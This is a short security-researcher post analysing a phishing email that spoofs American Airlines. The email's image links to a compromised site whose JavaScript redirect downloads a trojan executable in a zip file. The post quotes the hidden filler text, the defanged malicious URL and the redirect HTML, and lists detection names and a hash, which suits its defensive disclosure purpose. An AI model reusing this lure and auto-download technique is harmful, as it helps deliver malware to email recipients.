Email from American Airlines with image leads to malicious payload


MX Lab, http://www.mxlab.eu, started to intercept a few samples of a new trojan distribution campaign by email with the subject “Please download your ticket #NR4692” or “Please download your ticket #1881” (numbers will change in the emails).

The email is send from the spoofed address “American Airlines <message-nr86760@aa.com>” and has an embedded image with the instructions to print your flight ticket.

This is a typical example of the technique that is being used with image based spam in the past. The body also contains three paragraphs of text kept hidden from the reader.

<p style="color: rgb(255, 255, 255);">Youl aske me why I rather choose to haue A weight
of carrion flesh, then to receiue Three thousand DucatsIle not answer that But say it
is my humor; Is it answered What if my house be troubled with a Rat, And I be pleasd to
giue ten thousand Ducates To haue it baind What, are you answerd yet Some men there are
loue not a gaping Pigge Some that are mad, if they behold a Cat And others, when the
bag-pipe sings ith nose, Cannot containe their Vrine for affection. Masters of passion
swayes it to the moode Of what it likes or loaths, now for your answer As there is no
firme reason to be rendred Why he cannot abide a gaping Pigge Why he a harmlesse
necessarie Cat Why he a woollen bag-pipe but of force Must yeeld to such ineuitable
shame, As to offend himselfe being offended So can I giue no reason, nor I will not,
More then a lodgd hate, and a certaine loathing I beare Anthonio, that I follow thus
A loosing suite against him Are you answered Bass. 
</p>

The URL behind the image leads to hxxp://www.thepilatesstudio.ca/VZGTLYJTVT.htm and this site contains the following HTML code:

<!DOCTYPE html PUBLIC “-//W3C//DTD HTML 4.01 Transitional//EN”>
<html>
<head>

<meta content=”text/html; charset=Windows-1251″ http-equiv=”content-type”>
<title>redir</title>

</head>
<body>

<script language=”JavaScript”>
<!–
window.location=”AA_Ticket.zip”;
//–>
</script>
</body>
</html>

The Javascript will make sure you download the malicious payload.

The downloaded  AA_Ticket.zip contains AA_Ticket.exe.

The trojan is known as W32/Zortob.AA!tr, Mal/EncPk-AED, Posible_Worm32 or PAK_Generic.001.

At the time of writing, only 6 of the 41 AV engines did detect the trojan at Virus Total.

Virus Total permalink and SHA256: d1af9462258ace66c58d6d9029cb3d2992ed31eb7365874b9135a85199f6554e.